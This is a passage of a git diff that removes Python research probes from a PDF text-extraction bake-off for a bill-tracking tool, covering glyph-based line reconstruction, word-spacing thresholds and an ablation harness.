for s in d["samples_only_in_production"][:4]: - print(f" only in production: {s!r}", file=sys.stderr) - if args.out: - args.out.parent.mkdir(parents=True, exist_ok=True) - args.out.write_text(json.dumps({"documents": rows}, indent=1)) - if args.limit_docs and len(rows) >= args.limit_docs: - break - - tot_fired = Counter() - for r in rows: - tot_fired.update(r["branch_fired"]) - print("\nbranch firings over the documents scored:") - for k, v in tot_fired.items(): - print(f" {k:28} {v:,}") - print( - f"\n trailing-hyphen tokens production={sum(r['diff']['trailing_hyphen_production'] for r in rows)}" - f" hybrid={sum(r['diff']['trailing_hyphen_hybrid'] for r in rows)}" - ) - print( - f" soft-hyphen chars in text production={sum(r['diff']['soft_hyphen_chars_production'] for r in rows)}" - f" hybrid={sum(r['diff']['soft_hyphen_chars_hybrid'] for r in rows)}" - ) - print(f" hyphenated tokens only in hybrid: {sum(r['diff']['hyphenated_only_in_hybrid'] for r in rows)}") - print(f" hyphenated tokens only in production: {sum(r['diff']['hyphenated_only_in_production'] for r in rows)}") - if args.out: - print(f"\nwrote {args.out}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/probe_space_separability.py b/docs/research/pdf-backend-bakeoff/probes/probe_space_separability.py deleted file mode 100644 index 8a0a83c8..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/probe_space_separability.py +++ /dev/null @@ -1,204 +0,0 @@ -"""Probe: can ANY x-gap threshold separate word boundaries from intra-word kerning? - -`_SPACE_FACTOR` is a single global constant: a space is inserted when -`x0(next) - x1(prev) > factor * size(next)`. That rule can only work if the ratio -distribution at real word boundaries sits entirely above the distribution inside words. - -PDFium's own text page already knows the answer for each boundary, because it emits a -space character there -- either read from the content stream or GENERATED from font -metrics. So PDFium's stream is used here as the LABEL, and the geometry as the FEATURE. -This is not circular: the question is not "is PDFium right", it is "is the geometry the -neutral layer sees sufficient to recover the same decision with one constant". - -Reported per document: - * the ratio distribution for word boundaries and for intra-word adjacencies - * the overlap region, and the best achievable error at any threshold - * what the shipped 0.25 costs - -Read-only. Imports nothing from `src/deltatrack`. - -Run: - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/probe_space_separability.py \ - tests/corpus/114-hr-2029/4_reported-in-senate.pdf --pages 40 -""" - -from __future__ import annotations - -import argparse -import ctypes -import json -import math -import sys -from pathlib import Path - -import pypdfium2 as pdfium -import pypdfium2.raw as R - -SHIPPED_FACTOR = 0.25 -# Same baseline tolerance the neutral layer uses, so adjacency is judged on the same -# notion of "one printed line" the reconstruction works with. -BASELINE_TOL = 0.6 - - -def _chars(textpage, page_obj): - """Per-index (cp, generated, x0, x1, origin_y, size) for one page, stream order.""" - raw = textpage.raw - n = R.FPDFText_CountChars(raw) - out = [] - for i in range(max(n, 0)): - cp = R.FPDFText_GetUnicode(raw, i) - left, right, bottom, top = (ctypes.c_double() for _ in range(4)) - if not R.FPDFText_GetCharBox( - raw, i, ctypes.byref(left), ctypes.byref(right), ctypes.byref(bottom), ctypes.byref(top) - ): - continue - ox, oy = ctypes.c_double(), ctypes.c_double() - if not R.FPDFText_GetCharOrigin(raw, i, ctypes.byref(ox), ctypes.byref(oy)): - continue - mat = R.FS_MATRIX() - if not R.FPDFText_GetMatrix(raw, i, ctypes.byref(mat)): - continue - gen = R.FPDFText_IsGenerated(raw, i) == 1 - size = R.FPDFText_GetFontSize(raw, i) * math.sqrt(mat.a * mat.a + mat.b * mat.b) - out.append((cp, gen, left.value, right.value, oy.value, size)) - return out - - -def pairs_for_page(chars): - """Yield (ratio, is_word_boundary) for adjacent INK pairs on the same printed line. - - Ink = a character PDFium placed with real geometry and that is not whitespace. - A pair is a word boundary when the only things between the two ink characters are - space characters (of either kind); it is intra-word when they are directly adjacent. - Pairs separated by a line break are skipped -- the space rule never sees those. - """ - ink = [] # (index_in_chars, x0, x1, origin_y, size) - sep = {} # (a,b) ink-pair -> saw a space between them - prev = None - saw_space = False - for cp, _gen, x0, x1, oy, size in chars: - if cp in (10, 13): # line break: reset adjacency - prev, saw_space = None, False - continue - if cp == 32: - saw_space = True - continue - ink.append((x0, x1, oy, size)) - if prev is not None: - sep[len(ink) - 1] = saw_space - prev = len(ink) - 1 - saw_space = False - - for j in range(1, len(ink)): - if j not in sep: - continue - px0, px1, poy, _ps = ink[j - 1] - x0, _x1, oy, size = ink[j] - if abs(oy - poy) > BASELINE_TOL: # different printed lines - continue - if size <= 0: - continue - yield (x0 - px1) / size, sep[j] - - -def score(doc_pairs): - """Best achievable threshold and its error count, plus what 0.25 costs.""" - bnd = sorted(r for r, w in doc_pairs if w) - intra = sorted(r for r, w in doc_pairs if not w) - if not bnd or not intra: - return None - # A threshold t inserts a space when ratio > t. Errors = boundaries with ratio <= t - # (missed space) + intra-word with ratio > t (spurious space). Sweep every candidate. - cands = sorted({round(r, 6) for r in bnd + intra}) - best = None - for t in cands: - miss = sum(1 for r in bnd if r <= t) - spur = sum(1 for r in intra if r > t) - if best is None or miss + spur < best[1]: - best = (t, miss + spur, miss, spur) - miss25 = sum(1 for r in bnd if r <= SHIPPED_FACTOR) - spur25 = sum(1 for r in intra if r > SHIPPED_FACTOR) - return { - "word_boundaries": len(bnd), - "intra_word": len(intra), - "boundary_ratio_min": round(bnd[0], 4), - "boundary_ratio_p01": round(bnd[max(0, len(bnd) // 100)], 4), - "boundary_ratio_median": round(bnd[len(bnd) // 2], 4), - "intra_ratio_median": round(intra[len(intra) // 2], 4), - "intra_ratio_p99": round(intra[min(len(intra) - 1, len(intra) * 99 // 100)], 4), - "intra_ratio_max": round(intra[-1], 4), - "separable": bnd[0] > intra[-1], - "overlap_boundaries_below_intra_max": sum(1 for r in bnd if r <= intra[-1]), - "best_threshold": round(best[0], 4), - "best_threshold_errors": best[1], - "best_threshold_missed_spaces": best[2], - "best_threshold_spurious_spaces": best[3], - "shipped_0.25_missed_spaces": miss25, - "shipped_0.25_spurious_spaces": spur25, - } - - -def main() -> int: - ap = argparse.ArgumentParser() - ap.add_argument("pdfs", nargs="+") - ap.add_argument("--pages", type=int, default=None, help="limit pages per document") - ap.add_argument("--json-out", type=Path) - args = ap.parse_args() - - results = {} - pooled: list[tuple[float, bool]] = [] - for path in args.pdfs: - doc = pdfium.PdfDocument(path) - pairs: list[tuple[float, bool]] = [] - try: - n = len(doc) if args.pages is None else min(args.pages, len(doc)) - for p in range(n): - pg = doc[p] - tp = pg.get_textpage() - try: - pairs.extend(pairs_for_page(_chars(tp, pg))) - finally: - tp.close() - pg.close() - finally: - doc.close() - s = score(pairs) - results[path] = s - pooled.extend(pairs) - if s: - print(f"\n## {path} (pages={n})") - print(f" word boundaries={s['word_boundaries']} intra-word={s['intra_word']}") - print( - f" boundary gap/size: min={s['boundary_ratio_min']} " - f"p01={s['boundary_ratio_p01']} median={s['boundary_ratio_median']}" - ) - print( - f" intra-word gap/size: median={s['intra_ratio_median']} " - f"p99={s['intra_ratio_p99']} max={s['intra_ratio_max']}" - ) - print(f" linearly separable by ONE threshold: {s['separable']}") - print( - f" best possible threshold {s['best_threshold']} still errs on " - f"{s['best_threshold_errors']} pairs " - f"({s['best_threshold_missed_spaces']} missed, {s['best_threshold_spurious_spaces']} spurious)" - ) - print( - f" shipped 0.25 errs on {s['shipped_0.25_missed_spaces']} missed + " - f"{s['shipped_0.25_spurious_spaces']} spurious" - ) - - if len(args.pdfs) > 1: - s = score(pooled) - results["__pooled__"] = s - print(f"\n## POOLED over {len(args.pdfs)} documents") - print(json.dumps(s, indent=1)) - - if args.json_out: - args.json_out.parent.mkdir(parents=True, exist_ok=True) - args.json_out.write_text(json.dumps(results, indent=1)) - print(f"\nwrote {args.json_out}") - return 0 - - -if __name__ == "__main__": - sys.exit(main()) diff --git a/docs/research/pdf-backend-bakeoff/probes/reconstruct.py b/docs/research/pdf-backend-bakeoff/probes/reconstruct.py deleted file mode 100644 index 4f5b62da..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/reconstruct.py +++ /dev/null @@ -1,304 +0,0 @@ -"""Neutral reconstruction: `PdfPage` glyph facts -> the `Page`/`Line` structures DeltaTrack consumes. - -This is the layer the spec calls for in "the seam must be glyph facts, not PDFium-shaped -text". Every backend is graded through this one implementation, so no backend can win by -imitating the incumbent's text-API conventions. - -WHAT THIS LAYER DOES NOT NEED, and why that matters ---------------------------------------------------- -`parsers/pdf_text.normalize_raw` has no counterpart here, and that is the point. Every -transformation it performs exists to undo damage PDFium's *text API* does: - - * the U+FFFE soft-hyphen glyph with the next margin number glued inline - * footer chrome dragged onto a line by a page-boundary hyphen - * trailing spaces PDFium keeps on nearly every line - * a scrambled reading order that floats running headers to the top of the page - -None of those exist in the glyph stream. At glyph level GPO renders an ordinary -hyphen-minus at a syllable break, chrome sits where it is printed, and reading order is -whatever we choose -- here, strictly top-to-bottom by baseline. So the neutral path is -SHORTER than the incumbent's, not longer, and it is a genuine finding of this spike that -~40% of `pdf_text.py`'s regex surface is backend-repair rather than domain logic. - -WHAT IT REUSES --------------- -`_merge_print_lines`, `_parse_print_lines` and `rejoin_soft_hyphens` are imported from -production unchanged: they operate on already-assembled lines and carry no PDFium -assumption. `_line_text` and `_first_word_right` are reimplemented here only because the -production versions take a fixed 5-tuple; the logic (gap-based spacing, space-glyph word -boundary) is identical and is exercised against the incumbent by the calibration gate. - -`_cluster_baselines` is deliberately NOT reused. It clusters on the char-box bottom with -a tolerance of 0.5x the page-median glyph size, which is correct for its own purpose (a -margin-number -> geometry sidecar, where a descender-only fragment simply fails the -line-number match and is dropped) but wrong for text reconstruction: on a 14pt body line -the descender drop is ~8.4pt against a 7pt tolerance, so `heading` splits into `headin` -plus a stray `g`. The contract carries the text-matrix origin instead, which every -candidate backend exposes and which is exact. -""" - -from __future__ import annotations - -import re -import statistics -import sys -from pathlib import Path - -# Locate the engine relative to this file when running from the checkout. Under Pyodide -# the probes live in a flat VFS with no repo above them and `deltatrack` is already on -# sys.path, so the derivation is guarded rather than assumed -- an unguarded parents[3] -# raises IndexError there and takes every browser backend down with it. -_here = Path(__file__).resolve() -if len(_here.parents) > 3: - _src = _here.parents[3] / "src" - if _src.is_dir() and str(_src) not in sys.path: - sys.path.insert(0, str(_src)) - -from contract import BASELINE, CP, SIZE, UPRIGHT, X0, X1, PdfPage # noqa: E402 - -from deltatrack.parsers.pdf_text import ( # noqa: E402 - Line, - LineGeom, - Page, - _merge_print_lines, - rejoin_soft_hyphens, -) - -_NUMBERED_LINE = re.compile(r"^(\d{1,2}) (.*)$") -_SIZE_FLOOR = 1.0 # points; drop degenerate/zero-scale glyphs (clip/invisible) -_SPACE_FACTOR = 0.25 # x-gap > factor x glyph size => insert a word space -_BASELINE_TOL = 0.6 # points; baselines within this are the same printed line - -# Page chrome, matched against a RECONSTRUCTED VISUAL LINE (not a scrambled text blob), -# so each pattern anchors the whole line rather than hunting inside a page-wide string. -_CHROME_PATTERNS = ( - re.compile(r"^\d{1,4}$"), # page-number header - re.compile(r"^•\s*(?:HR|S|H|HRES|SRES|HJRES|SJRES|HCONRES|SCONRES)\b.*$"), - re.compile(r"^(?:H|S|HR|HRES|SRES|HJRES|SJRES|HCONRES|SCONRES)\s+\d+\s+[A-Z]{2,4}$"), - re.compile(r"^VerDate\b"), - re.compile(r"\bon DSK\S*\s*(?:PROD|with)\b"), - re.compile(r"^\S+ on DSK"), -) -# The rotated left-gutter watermark is set in a small face and breaks into 2-4 glyph -# fragments ('ORP', 'N32', 'Dn'). It is caught by size, not by pattern: no printed body -# line on a GPO bill page is set below this fraction of the page's dominant body size. -_CHROME_SIZE_RATIO = 0.55 - - -def _line_text(cluster: list) -> str: - """Reconstruct a visual line's text, inserting a space where the x-gap to the next - glyph exceeds SPACE_FACTOR x its size. - - Backend-neutral in both directions: PDFium emits real space glyphs and needs the gap - rule only between the margin number and the body, while PDF.js loses inter-word - spaces at font boundaries (`Providedfurther,That`) and needs the gap rule everywhere. - One rule serves both, which is why the seam is geometry rather than text. - """ - items = sorted(cluster, key=lambda g: g[X0]) - out: list[str] = [] - prev_right: float | None = None - for g in items: - if prev_right is not None and g[X0] - prev_right > _SPACE_FACTOR * g[SIZE]: - out.append(" ") - out.append(chr(g[CP])) - prev_right = g[X1] - return re.sub(r" +", " ", "".join(out)).strip() - - -def _first_word_right(content_glyphs: list) -> float | None: - """Right x-edge of the first word in a line's content glyphs, or None if empty. - - Same two-test rule as production: a real space glyph ends the first word, and a wide - x-gap is the fallback for backends that emit no space glyph. - """ - first_word_right: float | None = None - prev_right: float | None = None - for g in content_glyphs: - if g[CP] == 32: - if first_word_right is None: - continue - break - if prev_right is not None and g[X0] - prev_right > _SPACE_FACTOR * g[SIZE]: - break - first_word_right = g[X1] - prev_right = g[X1] - return first_word_right - - -def cluster_lines(page: PdfPage) -> list[list]: - """Group a page's glyphs into printed lines by baseline, top of page first. - - Tolerance is a small absolute value rather than a fraction of glyph size: the - contract's baseline is the text-matrix origin, which is exact and shared across a - printed line regardless of the glyph sizes on it, so no size-derived slack is needed. - A fractional tolerance would merge a small chrome line into an adjacent body line on - pages where the two sit close together. - """ - # Rotated glyphs are excluded outright. GPO sets a vertical watermark down the left - # gutter; for rotated text the matrix origin is not a horizontal baseline, so those - # glyphs land on arbitrary y values and collide with body lines (measured: a stray - # rotated glyph destroyed the margin-number match on printed lines 24 and 25). They - # are page chrome in every case, so dropping them loses nothing. - kept = [g for g in page.glyphs if g[SIZE] > _SIZE_FLOOR and g[UPRIGHT]] - if not kept: - return [] - rows: list[list] = [] - current: list = [] - anchor: float | None = None - for g in sorted(kept, key=lambda g: -g[BASELINE]): - if anchor is None or abs(g[BASELINE] - anchor) <= _BASELINE_TOL: - current.append(g) - if anchor is None: - anchor = g[BASELINE] - else: - rows.append(current) - current = [g] - anchor = g[BASELINE] - if current: - rows.append(current) - return rows - - -def _dominant_size(rows: list[list]) -> float: - """The page's dominant printed-body glyph size, used as the chrome size threshold.""" - sizes = [g[SIZE] for row in rows for g in row] - if not sizes: - return 0.0 - try: - return statistics.mode([round(s, 1) for s in sizes]) - except statistics.StatisticsError: - return statistics.median(sizes) - - -def is_chrome(text: str, row: list, body_size: float) -> bool: - if not text: - return True - for pat in _CHROME_PATTERNS: - if pat.search(text): - return True - row_size = statistics.median([g[SIZE] for g in row]) - return bool(body_size) and row_size < _CHROME_SIZE_RATIO * body_size - - -def _repair_line_end(text: str) -> tuple[str, bool]: - """Rewrite a trailing unnamed glyph (U+FFFD) as a hyphen. - - THE POSITION RULE, and why it is neutral. A backend that cannot name a glyph still - reports that there is ink there. When that ink is the LAST thing on a printed line, - the only thing GPO sets in that position is a syllable-break hyphen, so the identity - is recoverable from position alone. The rule never inspects a backend-specific - codepoint (PDFium's 0x02, pdfminer's "(cid:N)"), only "unnamed ink, line-final", so - it is available to every backend equally and is a no-op for the four that already - resolve the character. - - It is applied in `repaired` mode ONLY. Scoring runs both ways and reports the gap, - because the size of that gap IS the measurement of a backend's glyph-naming deficit, - and folding the repair in by default would hide exactly the difference the bake-off - exists to find. - """ - if text.endswith("�"): - return text[:-1] + "-", True - return text, False - - -def reconstruct_page(page: PdfPage, repaired: bool = False) -> tuple[Page, dict]: - """Turn one `PdfPage` of glyph facts into a DeltaTrack `Page`. - - Returns the page plus a per-page diagnostic dict the scorer aggregates (visual lines - seen, dropped as chrome, carrying a margin number, and repaired line ends). - """ - rows = cluster_lines(page) - body_size = _dominant_size(rows) - - print_lines: list[Line] = [] - line_sizes: dict[int, tuple[float, LineGeom]] = {} - ambiguous: set[int] = set() - n_chrome = 0 - n_numbered = 0 - n_repaired = 0 - n_unnamed = 0 - - for row in rows: - ordered = sorted(row, key=lambda g: g[X0]) - text = _line_text(ordered) - if is_chrome(text, ordered, body_size): - n_chrome += 1 - continue - - n_unnamed += text.count("�") - if repaired: - text, did = _repair_line_end(text) - n_repaired += did - - m = _NUMBERED_LINE.match(text) - if not m: - print_lines.append(Line(None, text)) - continue - - n_numbered += 1 - line_number = int(m.group(1)) - content = m.group(2) - print_lines.append(Line(line_number, content)) - - # Geometry sidecar, keyed by margin line number exactly as production does, so a - # duplicate number within a page is dropped as ambiguous rather than overwritten. - n_margin = len(m.group(1)) - content_glyphs = ordered[n_margin:] - printed = [g for g in content_glyphs if g[CP] != 32] - if not printed: - continue - sizes = [g[SIZE] for g in printed] - fwr = _first_word_right(content_glyphs) - if fwr is None: - continue - geom = LineGeom(printed[0][X0], max(g[X1] for g in printed), fwr) - if line_number in line_sizes or line_number in ambiguous: - ambiguous.add(line_number) - line_sizes.pop(line_number, None) - continue - line_sizes[line_number] = (round(statistics.median(sizes), 1), geom) - - merged, ranges = _merge_print_lines(print_lines) - merged = [ - ln - if ln.line_number is None or ln.line_number not in line_sizes - else Line( - ln.line_number, - ln.text, - line_sizes[ln.line_number][0], - line_sizes[ln.line_number][1], - ) - for ln in merged - ] - diag = { - "visual_lines": len(rows), - "chrome_lines": n_chrome, - "numbered_lines": n_numbered, - "ambiguous_numbers": len(ambiguous), - "unnamed_glyphs": n_unnamed, - "repaired_line_ends": n_repaired, - } - return Page(page.page_number, tuple(merged), tuple(print_lines), tuple(ranges)), diag - - -def reconstruct(pages: list[PdfPage], repaired: bool = False) -> tuple[list[Page], dict]: - out: list[Page] = [] - agg = { - "visual_lines": 0, - "chrome_lines": 0, - "numbered_lines": 0, - "ambiguous_numbers": 0, - "unnamed_glyphs": 0, - "repaired_line_ends": 0, - } - for p in pages: - page, diag = reconstruct_page(p, repaired=repaired) - out.append(page) - for k, v in diag.items(): - agg[k] += v - return out, agg - - -def full_text(pages: list[Page]) -> str: - """Whole-document text with cross-page soft hyphens rejoined, for text scoring.""" - return rejoin_soft_hyphens("\n".join(p.text for p in pages)) diff --git a/docs/research/pdf-backend-bakeoff/probes/reconstruct_hybrid.py b/docs/research/pdf-backend-bakeoff/probes/reconstruct_hybrid.py deleted file mode 100644 index 6294c918..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/reconstruct_hybrid.py +++ /dev/null @@ -1,276 +0,0 @@ -"""Hybrid reconstruction: engine-ordered characters + geometry -> DeltaTrack `Page`. - -Deliberately a minimal edit of `reconstruct.py`, so that a difference in results is -attributable to the one thing that changed. Identical here: the margin-number regex, the -chrome patterns, the chrome size ratio, the baseline tolerance, the geometry sidecar, the -merge, and the reuse of production's `_merge_print_lines` / `rejoin_soft_hyphens`. - -THE ONE THING THAT CHANGED, and the whole hypothesis: - - reconstruct.py sorts a line's glyphs by x and RE-DERIVES the word spaces from - x-gaps, using one global constant (`_SPACE_FACTOR`). - this module takes the line's characters in the engine's own order and uses the - word spaces the engine already decided, including the ones it - SYNTHESISED rather than read from the page. - -Line assignment stays geometric (cluster on baseline), not stream-order, and that split -is the point of the design rather than a compromise. The two failure modes are different -and they live at different scales: - - * BETWEEN lines, PDFium's reading order is unreliable on GPO pages -- it floats the - running header to the top of the page. Geometry fixes that, and `pdf_text.py`'s - `strip_page_chrome` exists because the string pipeline cannot. - * WITHIN a line, geometry is not sufficient -- see `probe_space_separability.py`: the - gap/size ratio at real word boundaries overlaps the ratio inside words, so no single - threshold separates them. The engine's decision is. - -So each layer is used where it is actually the better source, rather than one being -declared authoritative for everything. - -WHAT THIS LAYER DOES NOT NEED, and why that is a finding --------------------------------------------------------- -Against `reconstruct.py` it drops the x-gap word-space rule and the "unnamed ink, -line-final" hyphen heuristic. Against `parsers/pdf_text.py` it additionally drops -`normalize_raw` in full: the U+FFFE-plus-glued-margin-number rewrite, the glued-chrome -rewrite, the mid-line hyphen join and the trailing-space strip are all repairs of damage -that only exists in a page-wide text BLOB, and none of it exists once the characters are -addressed by index with their geometry attached. -""" - -from __future__ import annotations - -import re -import statistics -import sys -from pathlib import Path - -_here = Path(__file__).resolve() -if len(_here.parents) > 3: - _src = _here.parents[3] / "src" - if _src.is_dir() and str(_src) not in sys.path: - sys.path.insert(0, str(_src)) - -from contract_hybrid import BASELINE, CP, FONT, GEN, SIZE, UPRIGHT, X0, X1, HybridPage # noqa: E402 - -from deltatrack.parsers.pdf_text import ( # noqa: E402 - Line, - LineGeom, - Page, - _merge_print_lines, - rejoin_soft_hyphens, -) - -_NUMBERED_LINE = re.compile(r"^(\d{1,2}) (.*)$") -_SIZE_FLOOR = 1.0 -_BASELINE_TOL = 0.6 -_SOFT_HYPHEN = "­" - -# Byte-for-byte the patterns in reconstruct.py. Chrome identification is GPO knowledge, -# not PDF-layout knowledge, so it is exactly the part that should NOT move to the engine. -_CHROME_PATTERNS = ( - re.compile(r"^\d{1,4}$"), - re.compile(r"^•\s*(?:HR|S|H|HRES|SRES|HJRES|SJRES|HCONRES|SCONRES)\b.*$"), - re.compile(r"^(?:H|S|HR|HRES|SRES|HJRES|SJRES|HCONRES|SCONRES)\s+\d+\s+[A-Z]{2,4}$"), - re.compile(r"^VerDate\b"), - re.compile(r"\bon DSK\S*\s*(?:PROD|with)\b"), - re.compile(r"^\S+ on DSK"), -) -_CHROME_SIZE_RATIO = 0.55 - - -def cluster_lines(page: HybridPage) -> list[list]: - """Group a page's characters into printed lines by baseline, top of page first. - - Order WITHIN each returned line is the engine's char order, preserved. Only the - assignment of a character to a line is geometric. - - Generated characters are kept: their baseline is real (measured -- it is the one - geometric fact `FPDFText_GetCharOrigin` supplies for them) and they carry the word - spacing this layer exists to use. They are exempt from the size floor and the upright - test, both of which read fields a generated char does not have. - """ - kept = [ - (i, c) - for i, c in enumerate(page.chars) - if c[BASELINE] is not None and (c[GEN] or (c[SIZE] is not None and c[SIZE] > _SIZE_FLOOR and c[UPRIGHT])) - ] - if not kept: - return [] - rows: list[list] = [] - current: list = [] - anchor: float | None = None - # Descending baseline puts the top of the page first. Sorting by baseline is ONLY a - # way to decide which line a character belongs to; it must not be allowed to decide - # the order WITHIN a line, because origins on one printed line differ by float noise. - # Measured: a heading's full-size initial letter reports a baseline 0.003 pt above the - # small caps that follow it, which is enough for a baseline sort to hoist it to the - # front of the line and render `MILITARY` as `M6 ILITARY`. Each row is therefore - # restored to engine order before it is read. - for item in sorted(kept, key=lambda t: (-t[1][BASELINE], t[0])): - c = item[1] - if anchor is None or abs(c[BASELINE] - anchor) <= _BASELINE_TOL: - current.append(item) - if anchor is None: - anchor = c[BASELINE] - else: - rows.append(current) - current = [item] - anchor = c[BASELINE] - if current: - rows.append(current) - return [[c for _i, c in sorted(row, key=lambda t: t[0])] for row in rows] - - -def _line_text(row: list) -> str: - """Join a printed line's characters in engine order. No spacing rule is applied. - - Line-break characters PDFium generates at the end of a row are dropped; the row IS - the line. A soft hyphen is rendered as an ASCII hyphen so production's - `_merge_print_lines` and `rejoin_soft_hyphens` see the boundary they already know. - """ - out = [] - for c in row: - ch = chr(c[CP]) - if ch in ("\r", "\n"): - continue - out.append("-" if ch == _SOFT_HYPHEN else ch) - return re.sub(r" +", " ", "".join(out)).strip() - - -def _dominant_size(rows: list[list]) -> float: - sizes = [c[SIZE] for row in rows for c in row if c[SIZE] is not None] - if not sizes: - return 0.0 - try: - return statistics.mode([round(s, 1) for s in sizes]) - except statistics.StatisticsError: - return statistics.median(sizes) - - -def is_chrome(text: str, row: list, body_size: float) -> bool: - if not text: - return True - for pat in _CHROME_PATTERNS: - if pat.search(text): - return True - sizes = [c[SIZE] for c in row if c[SIZE] is not None] - if not sizes: - return True - return bool(body_size) and statistics.median(sizes) < _CHROME_SIZE_RATIO * body_size - - -def _first_word_right(content: list) -> float | None: - """Right x-edge of the first word among a line's content characters. - - Simpler than either predecessor, and for a reason worth recording: a word boundary - here is just "a space character", with no x-gap fallback, because the engine emits a - space at every boundary -- generated where the content stream has none. The fallback - the other two implementations need exists only to cover boundaries the engine already - marked. - """ - first_right: float | None = None - for c in content: - if c[CP] == 32: - if first_right is None: - continue - break - if c[X1] is not None: - first_right = c[X1] - return first_right - - -def reconstruct_page(page: HybridPage) -> tuple[Page, dict]: - rows = cluster_lines(page) - body_size = _dominant_size(rows) - - print_lines: list[Line] = [] - line_sizes: dict[int, tuple[float, LineGeom]] = {} - ambiguous: set[int] = set() - n_chrome = n_numbered = n_unnamed = 0 - n_out_of_order = 0 - - for row in rows: - # Diagnostic only, never a correction: how often engine order disagrees with - # left-to-right x order on a printed line. If this were large the design would be - # unsound, so it is counted rather than assumed away. - xs = [c[X0] for c in row if c[X0] is not None] - if any(b < a for a, b in zip(xs, xs[1:])): - n_out_of_order += 1 - - text = _line_text(row) - if is_chrome(text, row, body_size): - n_chrome += 1 - continue - n_unnamed += text.count("�") - - m = _NUMBERED_LINE.match(text) - if not m: - print_lines.append(Line(None, text)) - continue - - n_numbered += 1 - line_number = int(m.group(1)) - print_lines.append(Line(line_number, m.group(2))) - - # Geometry sidecar, keyed by margin line number exactly as production does. - # The margin number is skipped by counting its characters in the same stream the - # text was read from, so the two cannot drift apart. - ink = [c for c in row if chr(c[CP]) not in ("\r", "\n")] - content = ink[len(m.group(1)) :] - printed = [c for c in content if c[CP] != 32 and c[X0] is not None] - if not printed: - continue - fwr = _first_word_right(content) - if fwr is None: - continue - geom = LineGeom(printed[0][X0], max(c[X1] for c in printed), fwr) - sizes = [c[SIZE] for c in printed if c[SIZE] is not None] - if not sizes: - continue - if line_number in line_sizes or line_number in ambiguous: - ambiguous.add(line_number) - line_sizes.pop(line_number, None) - continue - line_sizes[line_number] = (round(statistics.median(sizes), 1), geom) - - merged, ranges = _merge_print_lines(print_lines) - merged = [ - ln - if ln.line_number is None or ln.line_number not in line_sizes - else Line(ln.line_number, ln.text, line_sizes[ln.line_number][0], line_sizes[ln.line_number][1]) - for ln in merged - ] - diag = { - "visual_lines": len(rows), - "chrome_lines": n_chrome, - "numbered_lines": n_numbered, - "ambiguous_numbers": len(ambiguous), - "unnamed_glyphs": n_unnamed, - "out_of_order_lines": n_out_of_order, - } - return Page(page.page_number, tuple(merged), tuple(print_lines), tuple(ranges)), diag - - -def reconstruct(pages: list[HybridPage]) -> tuple[list[Page], dict]: - out: list[Page] = [] - agg = { - "visual_lines": 0, - "chrome_lines": 0, - "numbered_lines": 0, - "ambiguous_numbers": 0, - "unnamed_glyphs": 0, - "out_of_order_lines": 0, - } - for p in pages: - page, diag = reconstruct_page(p) - out.append(page) - for k, v in diag.items(): - agg[k] += v - return out, agg - - -def full_text(pages: list[Page]) -> str: - return rejoin_soft_hyphens("\n".join(p.text for p in pages)) - - -__all__ = ["cluster_lines", "full_text", "is_chrome", "reconstruct", "reconstruct_page", "FONT"] diff --git a/docs/research/pdf-backend-bakeoff/probes/redteam_ablation.py b/docs/research/pdf-backend-bakeoff/probes/redteam_ablation.py deleted file mode 100644 index aace0f29..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/redteam_ablation.py +++ /dev/null @@ -1,182 +0,0 @@ -"""Red-team item 5: ablate every repair/normalization the neutral layer introduces. - -Each of these was added DURING the spike, several of them after seeing PDFium's output. -Any one could encode a PDFium-shaped assumption that flatters the incumbent and its WASM -twin. So each is removed in turn and the ranking recomputed. - -Ranking is recomputed on the two metrics that do NOT use PDFium as ground truth: - - text_f1 token F1 against the XML body (independent) - heading_f1 anchor labels against the XML tree's (independent) - heading-ish labels, LEVEL-AGNOSTIC because the two pipelines assign - different level names to the same objects -- comparing level-by-level - produces a spurious reversal, which this reviewer initially fell for. - -Breadcrumb agreement and T4 are deliberately NOT used here: both take PDFium as the -reference, so for PDFium-WASM they are close to tautological. - -Run: .venv/bin/python docs/research/pdf-backend-bakeoff/probes/redteam_ablation.py -""" - -from __future__ import annotations - -import json -import statistics -import sys -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -import reconstruct as R # noqa: E402 -from contract import ALL_BACKENDS, run_backend # noqa: E402 -from score_phase1 import align_to_body, normalize_for_text_compare, token_f1, xml_body_tokens # noqa: E402 - -from deltatrack.bill_tree import normalize_bill # noqa: E402 -from deltatrack.formatters.text_serializer import build_xml_full_text # noqa: E402 -from deltatrack.parsers.pdf_anchors import extract_anchors # noqa: E402 - -# A spread of print classes rather than a convenience sample. -DOCS = [ - "118-hr-4366/1_reported-in-house", - "118-hr-4366/4_engrossed-amendment-senate", - "118-hr-2882/5_engrossed-amendment-house", - "115-hr-5895/1_reported-in-house", - "118-s-4795/1_reported-in-senate", - "119-hr-1/1_reported-in-house", -] - - -def norm_label(s: str) -> str: - return " ".join((s or "").upper().replace(",", "").replace(".", "").split()) - - -def xml_heading_labels(xml: Path) -> set[str]: - v1 = normalize_bill(xml) - _, _, tree = build_xml_full_text(v1, v1) - flat, st = [], list(tree["v1"]) - while st: - n = st.pop() - flat.append(n) - st.extend(n.get("children") or []) - return { - norm_label(n.get("label")) - for n in flat - if n.get("level") in ("account", "agency", "heading") and n.get("label") - } - - -def f1(hit: int, n_cand: int, n_ref: int) -> float: - p = hit / n_cand if n_cand else 0.0 - r = hit / n_ref if n_ref else 0.0 - return 2 * p * r / (p + r) if (p + r) else 0.0 - - -def score(raw_pages, xml_tokens, xml_heads, repaired: bool) -> tuple[float, float]: - pages, _ = R.reconstruct(raw_pages, repaired=repaired) - toks = normalize_for_text_compare("\n".join(p.text for p in pages)) - aligned, _ = align_to_body(xml_tokens, toks) - tf = token_f1(xml_tokens, aligned)["f1"] - anc = extract_anchors(pages) - P = {norm_label(a.text) for a in anc if a.kind in ("account", "agency", "grouping")} - hf = f1(len(P & xml_heads), len(P), len(xml_heads)) - return tf, hf - - -ABLATIONS = { - "baseline (as published, repaired)": {}, - "A: no repaired mode (strict)": {"repaired": False}, - "B: no upright filter": {"upright": False}, - "C: no size-based chrome rule": {"chrome_size": 0.0}, - "D: baseline tol 0.6 -> 2.0": {"tol": 2.0}, - "E: baseline tol 0.6 -> 0.1": {"tol": 